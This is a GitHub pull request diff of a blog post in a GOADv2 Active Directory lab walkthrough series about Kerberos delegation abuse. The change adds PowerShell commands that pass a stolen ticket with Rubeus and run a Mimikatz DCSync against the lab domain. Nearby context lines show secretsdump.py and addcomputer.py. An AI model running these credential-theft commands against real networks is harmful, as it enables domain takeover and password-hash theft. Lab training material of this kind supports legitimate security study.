Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 10 additions & 2 deletions _posts/2022-11-13-GOADv2-pwning-part10.md
Original file line number Diff line number Diff line change
Expand Up @@ -135,7 +135,15 @@ secretsdump.py -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING

![deleg_unconcstrained_secrets_dump.png](/assets/blog/GOAD/deleg_unconcstrained_secrets_dump.png)

> Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on Winterfell and bypass the defender AV
> Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz. Having a domain-joined machine should make this attack easier.

```powershell
.\Rubeus.exe ptt /ticket:doIFrzCCBaugAwIB......
.\mimikatz.exe "lsadump::dcsync /domain:sevenkingdoms.local /user:kingslanding$" "exit"
```

![image](https://github.com/Mayfly277/mayfly277.github.io/assets/18597330/d1b83fd7-1c9e-4791-89a5-4489f287b9b2)


> Unless you didn't notice, the unconstrained delegation abuse was here exploited to pass from the child to the parent domain ;)
{: .prompt-tip }
Expand Down Expand Up @@ -334,4 +342,4 @@ addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingsla
- And i recommend you to take a look at charlie's talk about delegation : [https://www.thehacker.recipes/ad/movement/kerberos/delegations#talk](https://www.thehacker.recipes/ad/movement/kerberos/delegations#talk)


Next time we will have fun with ACL : : ([Goad pwning part11]({% link _posts/2022-12-07-GOADv2-pwning-part11.md %})) :)
Next time we will have fun with ACL : : ([Goad pwning part11]({% link _posts/2022-12-07-GOADv2-pwning-part11.md %})) :)